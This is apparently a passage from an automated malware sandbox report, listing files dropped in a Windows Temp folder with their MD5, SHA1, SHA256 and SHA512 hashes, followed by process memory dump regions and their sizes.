2a246b01a70ec2d8780d778acabe45605d6cba6853ac16797c2b67072e1f460c

SHA512
e5d79d9224073ee783e52f30577203c8672cbe61a955d67fe6812a60bada9e98e0743063dc1692dca3c9e78286bcf28dac734763fcf266bc1b3043356751f394

Download Submit
C:\Users\Admin\AppData\Local\Temp\E80B.bin1
MD5
c54bfecd54c5f8da53f4c20a55b93420

SHA1
a512ffe5ee4482051caea8390103e8808e0be4c5

SHA256
8f4819b9c858780e56992c01028c679b41bccd191a6c53e1b047af4d887cc71f

SHA512
ec730754eb78405e02d5e6e0962061fc2ee42f6d15c1222afb182b1a5e43d778024b9b40f9fff05e3d120c854c5ed86effde4a5d56c1659cf8be2145c6434b2e

Download Submit
C:\Users\Admin\AppData\Local\Temp\E80B.bin1
MD5
c54bfecd54c5f8da53f4c20a55b93420

SHA1
a512ffe5ee4482051caea8390103e8808e0be4c5

SHA256
8f4819b9c858780e56992c01028c679b41bccd191a6c53e1b047af4d887cc71f

SHA512
ec730754eb78405e02d5e6e0962061fc2ee42f6d15c1222afb182b1a5e43d778024b9b40f9fff05e3d120c854c5ed86effde4a5d56c1659cf8be2145c6434b2e

Download Submit
C:\Users\Admin\AppData\Local\Temp\E80B.bin1
MD5
505016722b09c4b86f2538385138c108

SHA1
4582c9b003271df92bc53814e729be565aa76eb3

SHA256
b4f4392773a6be3a9fae13207817d60137b7cbbcbbd3b2a1dcc9544b672d0448

SHA512
bea7267833d47dffee7620f978818bd4fbf681d92909d2ac59bf9aec053136494ee013bb2509ee1e4e892909f811c31fb9a197de37e6d4179cf4e57b22cc1c88

Download Submit
C:\Users\Admin\AppData\Local\Temp\E80B.bin1
MD5
505016722b09c4b86f2538385138c108

SHA1
4582c9b003271df92bc53814e729be565aa76eb3

SHA256
b4f4392773a6be3a9fae13207817d60137b7cbbcbbd3b2a1dcc9544b672d0448

SHA512
bea7267833d47dffee7620f978818bd4fbf681d92909d2ac59bf9aec053136494ee013bb2509ee1e4e892909f811c31fb9a197de37e6d4179cf4e57b22cc1c88

Download Submit
C:\Users\Admin\AppData\Local\Temp\E80B.bin1
MD5
e48b3c5d5b71c382ceee1236207bf52e

SHA1
0be0032cf67cf8f8cca3cef070a1d9467f8af9c5

SHA256
b4fe1d0c71fede395ef9deab36a39c204925b272cce75f0ab5f319ad71da1b47

SHA512
bdf73e4fe27713a979ecfbdec725f2b921257130548151e5e2e2b9dfb764324df6bb5fdca7fbfd80d669cf02ff9f5606dcfe4f3b6a94f755079c931b668d0069

Download Submit
C:\Users\Admin\AppData\Local\Temp\E80B.bin1
MD5
1c77a5338db730dfa51328debbd1a1b2

SHA1
8076fca3c92cfb2f83947bb1b3ff54f422c2d0c1

SHA256
f9d3a9531b0eb5c97bbf9bc1779e158f388573843afc1a99eb92610282885067

SHA512
72b8e400a83daf558faa2b9c7c20c42fc338867792fb05d4df25bbdeb2f2a76fac05dbb0f1c0d481c182ca4dac603d434b9eecef6f8b6175664d13a19442fa7a

Download Submit
C:\Users\Admin\AppData\Local\Temp\E80B.bin1
MD5
f2b08f8e2cae5609a8b2121559267996

SHA1
f6368b69c623bd862d4220193f4b59eb0fb9e501

SHA256
78d006dac104141596bd1ebe1e4169af7a29cbfb0483733ccabf059a36f9cf21

SHA512
133543787f4410b74b610f66a31c34d170a7bdb7e7d20de1727b083e514e55f52701f737685fe4f00473204f8732cb6f43dd1969447df9f6322bc5b900c2b1ba

Download Submit
C:\Users\Admin\AppData\Local\Temp\E80B.bin1
MD5
66ead12101740c8fdc8861f9ffd2a5fb

SHA1
d4cbdc660bc079a3cb359818216c7f4221ac8862

SHA256
3aab3a3c69417250660d383fab2be1ed8b60a0a3d731db9a79413f6714152341

SHA512
6487d2b672c34373e409c5fc2f17353bc51a8af3d565b089e4f5cebab7ae29770e2a8ad6f2bffd7b03dc3d4b805bc6a510a110c7c79de6f03445c3382a2a0fa6

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES552D.tmp
MD5
2263a38872e936d1f5ad810d4510b44a

SHA1
20849c2270bae747a0bc3eac131b010332775859

SHA256
d7029c896e0f1b9d4c39d87077c4dcd8c047fce0c0a035a35c2037550bf1738f

SHA512
9eae8e745d81fa9ee6dd5e1b24658fa307bc6793f5bb0697e5ed774c17fb630b571d893e126223eb6d2ba5dd2adcfe10d4f5a1c6083b7eff454943a928756840

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES55D9.tmp
MD5
e0897b5ebe446c0e371105e1b629a8fd

SHA1
0c7987a3d0337df45882e54782ab43f62e4535c5

SHA256
0ecf11ef4d53f4c1bd68d1b84952fbaa04d2159735cb96ca541ef79bfb4e8513

SHA512
e2fb08ae4f69de44393c586a30b451bf409458bbcfd6fcc8a5fb307a2bffe134feabb29f98a2abc58fa78ff676730807df48baeb456c2cba21e6c91de63b3735

Download Submit
C:\Users\Admin\AppData\Local\Temp\bw4poetz\bw4poetz.dll
MD5
1caf9124cc3b0cf776bec7feb5785768

SHA1
344bbe91830e5c6f22a0b4d6f492ca7acf4ec9ad

SHA256
b38545e19425e927697fbee72290a0a1e42dc422393c339e0a0f29a5d7b1989d

SHA512
74d954b5c6891d8894247671622b53660051b0dfc6758d89e7ee4f571ee705c8ca12d11942fc978e977974da2a2e83b0fd1c046924dfceaaf89634107f3cfd57

Download Submit
C:\Users\Admin\AppData\Local\Temp\md2rgzd4\md2rgzd4.dll
MD5
12b41dced22e88cc7ca350fab912a6e8

SHA1
3943382e58b26da9a7d7ec263182c000071d219c

SHA256
a61c456db71e39b944d870d84e114d11cddecde6b1d8f206c8d8b7e1084a4838

SHA512
6db0fdd11b0874c1843689eb7f5a6cc56e79e00c340283b19834d85e20a2b998e1af07bacbddc8e63803319978bfd5e4a607e70a39797dd3bb38dc8f32afaef2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bw4poetz\CSC89794ADBFCBC42E49791647E48AA48FA.TMP
MD5
0e2745ad17deeea8b35b3d6447059da3

SHA1
8e0d8d8994fd21881ad2b0205ec8df8086420946

SHA256
8a4682cc0cbbe8ecfa2dea51277d1942a6cdf9fbea1017d881c8b21f0a390882

SHA512
fbbe0abb2ee4863e868d5e31c0a356fdeff028cdcf4000bb811ceb46891e3231374625c4c471c0380bb30870bb4d4ad45d549096b33298e3ad7538084b7c0fd5

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bw4poetz\bw4poetz.0.cs
MD5
1feaccd652e2b46050061f890b8a74c5

SHA1
b54d20bb4c3e270881b51df4c9444c2157afb949

SHA256
58f143acb4f480b12663ff5811fdfc63bf341740575c6d3b05905e7bdf2dc76e

SHA512
daa39347b2c34efa25e5c27371880a536e8d665d770766b27e0b98cc258787ffb843b26916391059ac11a8e7e1256d6ef51ae626bac9176dea53ef6651258845

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bw4poetz\bw4poetz.cmdline
MD5
d62749208d1998eb7533ce92ff1f2af9

SHA1
53e1d634ab9dc825265e9d5bc0a8f49e1e14926d

SHA256
7bbe088dfb4b310f124f626e4c5ace6b6e932271f1d0b0187abdfff5dac2d143

SHA512
2b136b4648da366acc03e8e8952e0aec22234318e0300b987e7718bdff0c8c4c39cbda2d7683edecf680a846a3bd274506148d1e6c56ecf8ed608bd5e6bdf8bf

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\md2rgzd4\CSCD3C0C0473974D5F843D69355270D6BE.TMP
MD5
e9c58fead8c7f0602e88f3f4b8722745

SHA1
9946d003a73c42fb0bf6a4620d1638cb49f15e23

SHA256
06147200ba704b403b9945a979d3170b717a7a5eebc9f87f444ca329e9668e53

SHA512
c1239973348a4ed1c070e306d75660855185e0059e636eac6bdede52f4b953a99bc6d06bc2eb461f7b89da546808763d31e91815f37709efd1b77bc507ba2416

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\md2rgzd4\md2rgzd4.0.cs
MD5
41a1ae7b4d76efb00f16350cc3404b59

SHA1
64976c520f83e52c67985ae2d27ca4814a0a1eba

SHA256
155e74989cd60c904d2c2043ad3de0fd08bea8e8154a7850403718c18a886c10

SHA512
397238452dc9836aecb645f57377e3975acf59d47e601e1fe5549c32447cd2ce7d93f6b8a7e965cc696b44e972a03227f12af38cb30b0b7f95c99ab948dd7e12

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\md2rgzd4\md2rgzd4.cmdline
MD5
57f08105f033edac73adae316bc9440d

SHA1
dc7307e93cdf02e06cbb70d5580093e96d100d38

SHA256
137367eb00dfb5f0b90e6e181a7a6a6f8c43add138a70204c7bb79489d42dff3

SHA512
585e353e83db60e4b043e27f748672c569d6657b3e893d5f1945c7d2e7c579cea4586ea78d7e10806ec413b3b90f8c5dd88a1717a1f4e49d57d0fa648e6627b4

Download Submit
memory/220-140-0x000001B4CE580000-0x000001B4CE5A2000-memory.dmp

Filesize
136KB

Download
memory/220-141-0x00007FFB16CE3000-0x00007FFB16CE5000-memory.dmp

Filesize
8KB

Download
memory/220-142-0x000001B4B5220000-0x000001B4B5222000-memory.dmp

Filesize
8KB

Download
memory/220-144-0x000001B4B5226000-0x000001B4B5228000-memory.dmp

Filesize
8KB

Download
memory/220-155-0x000001B4CE930000-0x000001B4CE96E000-memory.dmp

Filesize
248KB

Download
memory/220-143-0x000001B4B5223000-0x000001B4B5225000-memory.dmp

Filesize
8KB

Download
memory/1092-164-0x00000239E6C90000-0x00000239E6C91000-memory.dmp

Filesize
4KB

Download
memory/1092-165-0x00000239E6E10000-0x00000239E6EB6000-memory.dmp

Filesize
664KB

Download
memory/2060-173-0x00000000008B0000-0x0000000000949000-memory.dmp

Filesize
612KB

Download
memory/2060-170-0x0000000000986B20-0x0000000000986B24-memory.dmp

Filesize
4B

Download
memory/2216-157-0x00000000008E0000-0x00000000008E1000-memory.dmp

Filesize
4KB

Download
memory/2216-158-0x0000000008010000-0x00000000080B6000-memory.dmp

Filesize
664KB

Download
memory/2560-132-0x0000000005D80000-0x0000000006324000-memory.dmp

Filesize
5.6MB

Download
memory/2560-131-0x0000000000B70000-0x0000000000DF0000-memory.dmp

Filesize
2.5MB

Download
memory/2560-135-0x00000000057A0000-0x00000000057AA000-memory.dmp

Filesize
40KB

Download
memory/2560-136-0x0000000005A33000-0x0000000005A35000-memory.dmp

Filesize
8KB

Download
memory/2560-130-0x0000000074B6E000-0x0000000074B6F000-memory.dmp

Filesize
4KB

Download
memory/2560-134-0x0000000005A30000-0x0000000005A31000-memory.dmp

Filesize
4KB

Download
memory/2560-133-0x00000000057D0000-0x0000000005862000-memory.dmp

Filesize
584KB

Download
memory/3408-159-0x00000216BDEC0000-0x00000216BDF66000-memory.dmp

Filesize
664KB

Download
memory/3408-156-0x00000216BDF70000-0x00000216BDF71000-memory.dmp

Filesize
4KB

Download
memory/3580-166-0x000001E606FC0000-0x000001E606FC1000-memory.dmp

Filesize
4KB

Download
memory/3580-167-0x000001E6078D0000-0x000001E607976000-memory.dmp

Filesize
664KB

Download
memory/3688-162-0x0000020588FD0000-0x0000020588FD1000-memory.dmp

Filesize
4KB

Download
memory/3688-163-0x000002058B3A0000-0x000002058B446000-memory.dmp

Filesize
664KB

Download
memory/3832-160-0x000001E7159D0000-0x000001E7159D1000-memory.dmp

Filesize
4KB

Download
memory/3832-161-0x000001E715920000-0x000001E7159C6000-memory.dmp

Filesize
664KB

Download
memory/4284-137-0x0000000000400000-0x000000000040D000-memory.dmp

Filesize
52KB

Download
memory/4284-138-0x0000000000400000-0x000000000040D000-memory.dmp

Filesize
52KB

Download